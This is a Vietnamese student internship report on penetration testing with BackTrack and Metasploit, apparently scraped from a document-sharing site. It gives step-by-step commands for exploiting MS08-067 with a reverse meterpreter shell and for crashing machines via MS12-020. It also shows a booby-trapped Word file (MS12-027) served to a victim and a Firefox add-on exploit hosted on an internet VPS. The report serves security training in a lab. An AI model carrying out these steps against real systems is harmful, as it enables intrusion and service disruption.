Linux web hosting (Bao cao)Linux web hosting (Bao cao)
Linux web hosting (Bao cao)An Pham
 
Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhạm Trung Đức
 
Bctt
BcttBctt
BcttLIL55
 
Báo cáo thực tập công ty ATHENA.
Báo cáo thực tập công ty ATHENA.Báo cáo thực tập công ty ATHENA.
Báo cáo thực tập công ty ATHENA.Tân Duy
 
Báo cáo thực tập Athena -CNTT
Báo cáo thực tập Athena -CNTTBáo cáo thực tập Athena -CNTT
Báo cáo thực tập Athena -CNTTPac CE
 
Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941Tan Huynh
 
Bia bao cao thuc tap cuoi ki
Bia bao cao thuc tap cuoi kiBia bao cao thuc tap cuoi ki
Bia bao cao thuc tap cuoi kiHình Vô
 

Similar to Báo cáo cuối kỳ (20)

Baocaothuctap
BaocaothuctapBaocaothuctap
Baocaothuctap
 
Bao cao athena
Bao cao athenaBao cao athena
Bao cao athena
 
Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]
 
Athena
AthenaAthena
Athena
 
Báo cáo athena
Báo cáo  athenaBáo cáo  athena
Báo cáo athena
 
Luong bao cao athena
Luong bao cao athenaLuong bao cao athena
Luong bao cao athena
 
Báo cáo thực tập windows server 2008 gia dinh ly huutai
Báo cáo thực tập windows server 2008 gia dinh ly huutaiBáo cáo thực tập windows server 2008 gia dinh ly huutai
Báo cáo thực tập windows server 2008 gia dinh ly huutai
 
Báo cáo cuối kỳ - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
Báo cáo cuối kỳ  - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...Báo cáo cuối kỳ  - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
Báo cáo cuối kỳ - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
 
Bao cao cuoi khoa
Bao cao cuoi khoaBao cao cuoi khoa
Bao cao cuoi khoa
 
Báo cáo thực tập athena 1
Báo cáo thực tập athena 1Báo cáo thực tập athena 1
Báo cáo thực tập athena 1
 
Đồ án Xây dựng website nộp đồ án trực tuyến
Đồ án Xây dựng website nộp đồ án trực tuyếnĐồ án Xây dựng website nộp đồ án trực tuyến
Đồ án Xây dựng website nộp đồ án trực tuyến
 
Bao cao thuc tap ck
Bao cao thuc tap ckBao cao thuc tap ck
Bao cao thuc tap ck
 
Linux web hosting (Bao cao)
Linux web hosting (Bao cao)Linux web hosting (Bao cao)
Linux web hosting (Bao cao)
 
Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tập
 
Bctt
BcttBctt
Bctt
 
Báo cáo thực tập công ty ATHENA.
Báo cáo thực tập công ty ATHENA.Báo cáo thực tập công ty ATHENA.
Báo cáo thực tập công ty ATHENA.
 
Báo cáo thực tập Athena -CNTT
Báo cáo thực tập Athena -CNTTBáo cáo thực tập Athena -CNTT
Báo cáo thực tập Athena -CNTT
 
Tường lửa ip cop
Tường lửa ip copTường lửa ip cop
Tường lửa ip cop
 
Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941
 
Bia bao cao thuc tap cuoi ki
Bia bao cao thuc tap cuoi kiBia bao cao thuc tap cuoi ki
Bia bao cao thuc tap cuoi ki
 

Báo cáo cuối kỳ

  • 1. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | i SVTH: Nguyễn Văn Tiến TRÍCH YẾU Hiện nay trong thời đại công nghệ thông tin vấn đề an toàn và bảo mật thông tin của mọi cá nhân, doanh nghiệp, cơ quan, tổ chức … được quan tâm hàng đầu. Do việc nhu cầu trao đổi thông tin giữa các cá nhân, tổ chức … ngày càng cao vì vậy vấn đề bảo mật là rất cần thiết. Nếu an ninh mạng không được quan tâm đúng mức sẽ có nhiều vấn đề nghiêm trọng xảy ra như xâm nhập bất hợp pháp, đánh cấp dữ liệu, tấn công, lừa đảo… Một trong những cách để hạn chế những vấn đề đó là luôn kiểm tra hệ thống, cài đặt phần mềm có license, cài đặt các bản vá… Trong thời gian thực tập 8 tuần từ ngày 12/05/2014 đến ngày 05/07/2014 tôi đã hoàn thành đồ án “ Nghiên cứu và sử dụng Backtrack để kiểm tra an ninh mạng”. Quá trình thực tập giúp tôi hiểu được về công việc của những người kiểm tra hệ thống mạng và tôi có thể vận dụng những kiến thức đã được học vào thực tế. Bên cạnh đó, tôi học hỏi được nhiều thứ trong cuộc sống từ các bạn thực tập chung và đặt biệt biệt là thầy Võ Đỗ Thắng. Tôi cam kết kết quả của đồ án là do tôi thực hiện dưới sự hướng dẫn của thầy Võ Đỗ Thắng(Giám đốc Trung tâm đào tạo Quản trị mạng và an ninh mạng Quốc tế Athena) không sao chép của người khác. Các bước của quá trình thực hiện được ghi lại bằng những đoạn phim ngắn và có thuyết minh. Danh sách các đoạn phim: Cài đặt Backtrack 5R3 https://www.youtube.com/watch?v=etNV0jf7sFk Các công cụ thu thập thông tin: https://www.youtube.com/watch?v=CePaGIHRhog Khai thác lổ hỏng MS08_067: https://www.youtube.com/watch?v=t0t8A0OPtoU Khai thác lổ hỏng MS12_020: https://www.youtube.com/watch?v=ZArVYCUj9BU Khai thác lổ hỏng MS12_027: https://www.youtube.com/watch?v=yLHvLe-olOM Cài Metasploit trên VPS: https://www.youtube.com/watch?v=YMqkg3duLQ8 Khai thác lỗ hỏng của firefox_xpi_bootstrapped qua mạng internet có sử dụng backdoor: https://www.youtube.com/watch?v=4oNY9pUmeb0
  • 2. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | ii SVTH: Nguyễn Văn Tiến MỤC LỤC Chương Mở Đầu: GIỚI THIỆU VỀ BACKTRACK.........................................1 I. Giới thiệu .................................................................................................1 II. Cài đặt......................................................................................................1 Chương 1: THU THẬP THÔNG TIN VÀ KHAI THÁC LỖ HỎNG CỦA HỆ ĐIỀU HÀNH WINDOWS TRONG MẠNG LAN.........................................................4 I. Giới thiệu .................................................................................................4 II. Thu thập thông tin....................................................................................5 1. Liệt kê dịch vụ......................................................................................5 2. Xác định phạm vi mạng........................................................................5 3. Xác định host có đang mở hay không ..................................................6 4. Các dịch vụ...........................................................................................6 5. Xác đinh hệ điều hành..........................................................................6 6. Nhận diện các dịch vụ ..........................................................................7 7. Đánh giá các mối đe dọa ......................................................................7 III. Khai thác lỗ hỏng qua mạng Lan.............................................................8 1. Khai thác lỗ hỏng MS08_067...............................................................8 2. Khai thác lỗ hỏng MS12_020.............................................................11 3. Khai thác lỗ hỏng MS12_027.............................................................13 Chương 2: XÂY DỰNG HONEYPOT ĐỂ XÂM NHẬP QUA MẠNG INTERNET 17 I. Giới thiệu về Honeypot..........................................................................17 II. Xâm nhập qua mạng internet bằng Honeypot .......................................17 1. Cài đặt Metasploit trên VPS...............................................................17 2. Khai thác qua mạng internet...............................................................21 3. Backdoor.............................................................................................23
  • 3. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | iii SVTH: Nguyễn Văn Tiến Lời Cảm Ơn Khoa Công Nghệ Thông Tin và Truyền Thông Trường Đại học Cần Thơ Em xin chân thành cảm ơn Khoa Công nghệ thông tin và Truyền thông trường Đại học Cần Thơ đã tạo điều kiện cho em hoàn thành tốt đợt thực tập thực tế này. Trong đợt thực tập này đã giúp em có nhiều kinh nghiệm thực tế trong học tập và cuộc sống. Những kinh nghiệm đó sẽ giúp em hiểu rõ và định hướng cho công việc sau này. Bên cạnh đó, em xin cảm ơn các Thầy Cô khoa CNTT&TT đã tận tình giảng dạy và trang bị cho em những kiến thức cần thiết và hỗ trợ cho em hoàn thành đề tài này. Trong quá trình thực tập thực tế đã hoàn thành nhưng không tránh khỏi những phần sai sót. Vì vậy, em rất mong nhận được ý kiến chân thành của quý Thầy Cô để em hoàn thiện hơn trong công việc và cuộc sống. Em xin chân thành cảm ơn! Tp Hồ Chí Minh, ngày 07 tháng 07 năm 2014 Sinh viên thực tập Nguyễn Văn Tiến
  • 4. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | iv SVTH: Nguyễn Văn Tiến Lời Cảm ơn Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc tế ATHENA Em xin chân thành cảm ơn Trung tâm đào tạo Quản trị mạng và An ninh mạng Quốc tế Athena đã tạo điều kiện cho em thực tập thực tế nơi đây. Em đã nhận được sự hỗ trợ nhiệt tình về cơ sở vật chất cũng như chuyên môn. Em xin bày tỏ lòng biết ơn đến quý Thầy Cô của trung tâm,đặt biệt là thầy Võ Đỗ Thắng đã chỉ dạy tận tình giúp em hoàn thành đề tài này. Trong quá trình thực tập thực tế đã hoàn thành nhưng không tránh khỏi những phần sai sót. Vì vậy, em rất mong nhận được ý kiến chân thành của quý Thầy Cô để em hoàn thiện hơn trong công việc và cuộc sống. Em xin chân thành cảm ơn! Tp Hồ Chí Minh, ngày 07 tháng 07 năm 2014 Sinh viên thực tập Nguyễn Văn Tiến
  • 5. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | v SVTH: Nguyễn Văn Tiến Giáo viên hướng dẫn thầy Võ Đỗ Thắng(phải) và sinh viên thực tập Nguyễn Văn Tiến
  • 6. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | vi SVTH: Nguyễn Văn Tiến NHẬN XÉT CỦA GIÁO VIÊN ---------oo0oo--------- ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. ................................................................................................................................. .................................................................................................................................
  • 7. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | vii SVTH: Nguyễn Văn Tiến GIỚI THIỆU TRUNG TÂM ATHENA 1. Giới thiệu Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước nhà . 2. Lĩnh vực hoạt động Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính… Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,… Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,... 3. Đội ngũ giảng viên Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế (Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA.
  • 8. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | viii SVTH: Nguyễn Văn Tiến Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA. 4. Cơ sở vật chất Thiết bị đầy đủ và hiện đại. Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ mới nhất. Phòng máy rộng rãi, thoáng mát. 5. Dịch vụ Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn. Giới thiệu việc làm cho mọi học viên. Thực tập có lương cho học viên khá giỏi. Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn thời gian. Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng máy tính, bảo mật mạng. Hỗ trợ thi Chứng chỉ Quốc tế. 6. Liên hệ Cơ sở 1: 92 Nguyễn Đình Chiểu, phường Đa Kao, Quận 1. Điện thoại: 090 78 79 477 - 094 323 00 99 - (08)38244041. Cơ sở 2: 2 Bis Đinh Tiên Hoàng, phường Đa Kao, Quận 1. Điện thoại: 094 320 00 88 - (08)22 10 38 01. Website: http://athena.edu.vn - http://athena.com.vn E-mail : support@athena.edu.vn - tuvan@athena.edu.vn
  • 9. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 1 SVTH: Nguyễn Văn Tiến Chương Mở Đầu: GIỚI THIỆU VỀ BACKTRACK I. Giới thiệu Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập. Trong các định dạng Live DVD, bạn sử dụng có thể Backtrack trực tiếp từ đĩa DVD mà không cần cài nó vào máy của bạn. Backtrack cũng có thể được cài đặt vào ổ cứng và sử dụng như một hệ điều hành. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm -IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện là Backtrack 5R3 được phát hành vào tháng 8 năm 2012 bổ sung hơn 60 công cụ mới. Một số thay đổi đáng chú ý bao gồm các công cụ thử nghiệm xâm nhập điện thoại di động, giao diện đồ họa cho công cụ crack- wifi, một thể loại hoàn toàn mới là công cụ khai thác vật lý. II. Cài đặt Nếu chúng ta muốn sử dụng Backtrack mà không cần cài nó vào ổ cứng hay Live DVD, chúng ta có thể ghi tập tin ảnh ISO vào đĩa DVD và khởi động máy tính của bạn với DVD. Backtrack sau đó sẽ chạy từ đĩa DVD. Lợi thế của việc sử dụng Backtrack là một DVD Live là nó là rất dễ dàng. Tuy nhiên, phương pháp này cũng có một số nhược điểm. Backtrack có thể không làm việc với phần cứng và thay đổi cấu hình nào được thực hiện trên phần cứng để làm việc sẽ không được lưu với đĩa DVD Live. Ngoài ra, nó là chậm vì máy tính cần phải tải các chương trình từ đĩa DVD. Cài đặt trong máy ảo. Điểm thuận lợi là chúng ta có thể dễ dàng sử dụng Backtrack với hệ điều hành hiện tại. Khuyết điểm là tốc độ chậm, không dùng được wireless trừ USB wireless. Ở đây tôi cài Backtrack 5R3 trên máy ảo VMWare. Sau đây là một số hình ảnh khi cài đặt Backtrack 5R3 Tạo máy ảo Backtrack
  • 10. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 2 SVTH: Nguyễn Văn Tiến Đặt tên và chọn nơi lưu máy ảo. Sau đó chúng ta hoàn thành các tùy chọn của máy ảo, tiếp theo chúng ta sẽ mở máy ảo lên. Chọn chế độ boot “text mode” và đăng nhập vào Backtrack với username :root và password là toor. Gõ “startx” để vào giao diện đồ họa .Sau đó chúng ta nhấn vào Install trên màn hình để cài đặt.
  • 11. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 3 SVTH: Nguyễn Văn Tiến Sauk hi điền các thông tin về ngôn ngữ, múi giờ, bàn phím, phân vùng ổ cứng thì sau đó ta bấm vào nút install để cài đặt Giao diện của BackTrack sau khi cài đặt hoàn thành trên VMWare
  • 12. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 4 SVTH: Nguyễn Văn Tiến Chương 1: THU THẬP THÔNG TIN VÀ KHAI THÁC LỖ HỎNG CỦA HỆ ĐIỀU HÀNH WINDOWS TRONG MẠNG LAN I. Giới thiệu Đầu tiên hacker tiến hành thu thập thông tin về hạ tầng của mục tiêu, mô hình của các Web Server, kiểu giao tiếp thông tin thông qua các cổng (port) nào, những site liên quan đến việc thực hiện chức năng của site mục tiêu... Việc thu thập thông tin là vấn đề quan trọng cho việc tấn công vào một hệ thống máy mục tiêu. Cho dù hacker tấn công theo phương diện phần cứng hay qua ứng dụng thì việc thu thập vẫn là cần thiết. FootPrinting (In dấu ấn - thu thập thông tin): Là bước mà kẻ tấn công thâu tóm càng nhiều thông tin càng tốt về đối tượng, người dùng, doanh nghiệp, các chi nhánh của công ty, máy chủ… bao gồm các chi tiết: Domain Name, Địa chỉ IP, Networking Prototcols…Đây là một bước quan trọng: Cho hacker nhiều thông tin, đôi khi với những thông tin này hacker đã có thể làm chủ hệ thống. Sử dụng công cụ Nslookup, SmartWhois… Sanning (Quét thăm dò mạng): là quá trình tìm hiểu thông tin về các live host trên mạng để giúp hacker quyết định kiểu tấn công nào vào hệ thống. Trong quá trình Scanning hacker sẽ tìm hiểu thông tin về: địa chỉ IP, cổng, hệ điều hành, network, … Enumeration (Điểm danh mạng - liệt kê tìm lỗ hổng): Đến đây, các hacker bắt đầu kiểm soát server sơ bộ. Bước này là quá trình tập hợp và phân tích tên người dùng, tên máy,tài nguyên chia sẽ và các dịch vụ. Sau đó tìm kiếm những tài nguyên được bảo vệ kém, hoặc tài khoản người dùng mà có thể sử dụng để xâm nhập, bao gồm các mật khẩu mặc định, các script và dịch vụ mặc định.
  • 13. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 5 SVTH: Nguyễn Văn Tiến II. Thu thập thông tin 1. Liệt kê dịch vụ Là tiến trình thu thập thông tin từ mạng, cho phép thu thập thông tin về tổ chức như tên người dùng, tên máy tính, địa chỉ IP, mail server… 2. Xác định phạm vi mạng Xác định phạm vi các địa chỉ IP từ mạng của mục tiêu Sử dụng Dmitry để lấy thông tin từ mục tiêu, sử dụng –wnsp để tra cứu lấy tên miền và quét cổng.
  • 14. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 6 SVTH: Nguyễn Văn Tiến Sử dụng “scapy” để xác định traceroute. Scapy : mở scapy res,unans=traceroute(["www.athena.edu.vn"],dport=[80,443],maxttl=20): xác định đường đi của gói tin đến Athena.edu.vn với port là 80 và 443, maxttl là 20. res.graph() :hiển thị đường đi gói tin 3. Xác định host có đang mở hay không Chúng ta có thể sử dụng lệnh ping đến mục tiêu. Nmap –sP [ip đích] : -sP giúp xâm nhập mạng mục tiêu nhanh chóng, giúp cho chúng ta biết host đó có up hay không. Tùy chọn sP sẽ gửi gói tin ICMP echo request và 1 gói tin TCP ACK tới cổng 80. 4. Các dịch vụ Để xem các dịch vụ nào đang mở trên đối tượng ta sử dụng Nmap [địa chỉ ip đích] Hay Nmap –p 1-1000 [địa chỉ ip đích] tìm port từ 1 đến 1000 có port nào đang mở hay không. Chúng ta cũng có thể scan 1 port nào đó nmap –p 80 [địa chỉ ip] 5. Xác đinh hệ điều hành Chúng ta đã biết được địa chỉ IP , máy hoạt động, xác định được các cổng mở của mục tiêu, bước tiếp theo là chúng ta xác định hệ điều hành nào đang chạy để cung
  • 15. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 7 SVTH: Nguyễn Văn Tiến cấp cho quá trình khac thác lỗ hổng. Nmap –O [địa chỉ IP] 6. Nhận diện các dịch vụ Xác định các dịch vụ dựa trên các cổng đã nhận diện 7. Đánh giá các mối đe dọa Backtrack sử dụng công cụ Metalgo, cung cấp thông tin tổng hợp từ bên trong lẫn bên ngoài để có thông tin rõ ràng về mối de doa.
  • 16. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 8 SVTH: Nguyễn Văn Tiến III. Khai thác lỗ hỏng qua mạng Lan Đặc điểm chung của một hệ thống mạng là có nhiều người sử dụng chung và phân tán về mặt địa lý nên việc bảo vệ tài nguyên (mất mát hoặc sử dụng không hợp lệ) phức tạp hơn nhiều so với việc môi trường một máy tính đơn lẻ, hoặc một người sử dụng. Hoạt động của người quản trị hệ thống mạng phải đảm bảo các thông tin trên mạng là tin cậy và sử dụng đúng mục đích, đối tượng đồng thời đảm bảo mạng hoạt động ổn định không bị tấn công bởi những kẻ phá hoại. Nhưng trên thực tế là không một mạng nào đảm bảo là an toàn tuyệt đối, một hệ thống dù được bảo vệ chắc chắn đến mức nào thì cũng có lúc bị vô hiệu hóa bởi những kẻ có ý đồ xấu. 1. Khai thác lỗ hỏng MS08_067 Khai thác trực tiếp lên dịch vụ, đây là dịch vụ chia sẽ file trên Windows được mở mặc định(port 445), attacker có thể làm tràn bộ đệm và thực thi một mã lệnh từ xa. Các hê điều hành bị ảnh hưởng : Windows 2000 sp4, Windows 2000 SP4, XP
  • 17. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 9 SVTH: Nguyễn Văn Tiến SP2 và SP3, Server 2003 SP1 và SP2, Vista SP1… Các bước thực hiện khai thác: Chúng ta mở msfconsole lên. Tiếp theo là chúng ta gõ: use exploit/windows/smb/ms08_067_netapi Chúng ta show options để sem các tùy chọn của nó. Tiếp đó chúng ta set RHOST (địa chỉ IP của máy nạn nhân) .
  • 18. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 10 SVTH: Nguyễn Văn Tiến Chúng ta set payload windows/meterpreter/reverse_rtcp Chúng ta set LHOST (địa chỉ IP của attacker). Và show targets để xem các tuy chọn.
  • 19. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 11 SVTH: Nguyễn Văn Tiến Chúng ta khai thác máy nạn nhân là winxp Sp3 nên tùy chọn là 5. Và cuối cung là exploit để khai thác. Và bây giờ chúng ya có thể xâm nhập vào máy win XP. Cách phong tránh là tắt các cổng không sử dụng. Cập nhật các bản vá. Cài các phần mềm có mua bản quyền. 2. Khai thác lỗ hỏng MS12_020 Do gửi các gói tin RDP đến đối tượng đích được khởi tạo không đúng cách hoặc bị xóa, gây ra tình trạng máy tính bị lỗi màn hình xanh và khởi động lại. Các hệ điều hành bị ảnh hưởng: Windows XP SP2 and SP3, Windows Server
  • 20. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 12 SVTH: Nguyễn Văn Tiến 2003 SP2, Windows Vista SP2, Windows Server 2008 … Quá trình thực hiện: Sử dụng lệnh: use auxiliary/dos/windows/rdp/ms12_020_maxchanelids Tiếp theo ta gõ: “show options” để xem các tùy chọn Chúng ta gõ: “set RHOST [địa chỉ IP máy nạn nhân]” Cuối cùn là “run” để thưc hiện. Chúng ta sẽ qua máy Win XP và thấy màn hình xanh
  • 21. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 13 SVTH: Nguyễn Văn Tiến Bên máy attacker thì báo hệ thống đã bị đánh sập. Cách phòng tránh là: cập nhật bản vá lỗi, tắt port 3389, cài chương trình diệt virus… 3. Khai thác lỗ hỏng MS12_027 Lỗi do định dạng file trên office. Các phần mềm bị ảnh hưởng :Office 2003 SP3, Office 2007 SP2, Office 2007 SP3, Office 2010 SP1... Quá trình thực hiện: sử dụng Backtrack 5r3 làm attacker và 1 máy Win XP SP2 có cài Office 2007 làm victim. Trên Metasploit console chúng ta gõ lệnh : “use exploit/windows/fileformat/ms12_027_mscomctl_bof”
  • 22. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 14 SVTH: Nguyễn Văn Tiến Đặt tên của file word tùy ý với phần mở rộng ”.doc” Tiếp theo là “set payload windows/meterpreter/reverse_tcp” Địa chỉ IP của attacker: “set LHOST [IP máy attack] và tiếp theo là exploit để tao ra fileword có chứa mã độc. Dùng lệnh cp để chuyển file này ra Desktop cho dễ dang sử dụng. Ta copy file word đã được tạo vào đường dẫn /var/www/
  • 23. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 15 SVTH: Nguyễn Văn Tiến Chúng ta start dich vụ web lên. Tiếp theo chúng ta tạo ra 1 lắng nge: “ use exploit/multi/handler” Và “ set payload windows/meterpreter/reverse_tcp” “set LHOST [IP của attacker]” Máy nạn nhân truy cập vào đường dẫn chứa file word và tải file đó về Sauk hi tai về thì mở file đó lên
  • 24. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 16 SVTH: Nguyễn Văn Tiến Chúng ta thấy trên máy attack có 1 sessions được tạo ra. Attacker kết nối vào và thực hiên tấn công.
  • 25. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 17 SVTH: Nguyễn Văn Tiến Chương 2: XÂY DỰNG HONEYPOT ĐỂ XÂM NHẬP QUA MẠNG INTERNET I. Giới thiệu về Honeypot Honeypot là một hệ thống tài nguyên thông tin được xây dựng với mục đích giả dạng đánh lừa những kẻ sử dụng và xâm nhập không hợp pháp, thu hút sự chú ý của chúng, ngăn không cho chúng tiếp xúc với hệ thống thật. Hệ thống tài nguyên thông tin có nghĩa là Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực tiếp tương tác với tin tặc và tìm cách khai thác thông tin về tin tặc như hình thức tấn công, công cụ tấn công hay cách thức tiến hành thay vì bị tấn công. Với mục tiêu xây dựng Honeypot để xâm nhập vào lỗ hổng hệ thống máy tính qua Internet, Hacker có thể sử dụng Máy chủ ảo (VPS) và cài đặt Metasploit để trở thành Honeypot và giả dạng là một Web server bình thường, từ đó đánh lừa máy nạn nhân khi một máy tính bất kỳ có kết nối Internet truy cập vào địa chỉ mà hacker cung cấp. II. Xâm nhập qua mạng internet bằng Honeypot 1. Cài đặt Metasploit trên VPS Quá trình cài đặt Metasploit trên máy VPS: ở đây tôi sử dụng phiên bản Metasploit 4.6.1. Yêu cầu đầu tiên là tắt các chương trình diệt virus và tường lửa. Giao diện Welcome chúng ta chon “Next”
  • 26. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 18 SVTH: Nguyễn Văn Tiến License Agreement chọn “ I accept the agreement” chọn “Next” Tạo ra 1 thư mục metasploit trên ổ C:, chọn Next
  • 27. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 19 SVTH: Nguyễn Văn Tiến Ở đây Metasploit sử SSL port là 3790 Tạo ra 1 Webserver với server name “localhost” và ngày hết hạn 3650, chúng ta cũng có thể thay đổi ngày hết hạn của nó. Quá trình cài đặt đang diễn ra
  • 28. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 20 SVTH: Nguyễn Văn Tiến Quá trình cài đặt đã hoàn tất.
  • 29. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 21 SVTH: Nguyễn Văn Tiến 2. Khai thác qua mạng internet Dựa vào những lỗi trên trình duyệt người tấn công sử dụng phương pháp nào đó làm cho các nạn nhân truy cập vào đường dẫn có chứa mã độc hay thực thi các mã độc đó. Tôi thưc hiện khai thác lỗ hỏng qua trình duyệt firefox dựa trên lỗi add on của firefox: ta sử dụng máy WinXP có cài firefox(tất cả các phiên bản điều được) và VPS đã được cài Metasploit (Honeypot): Trên VPS chúng ta mở msfconsole : “use exploit/multi/browser/firefox_xpi_bootstrapped_addon”
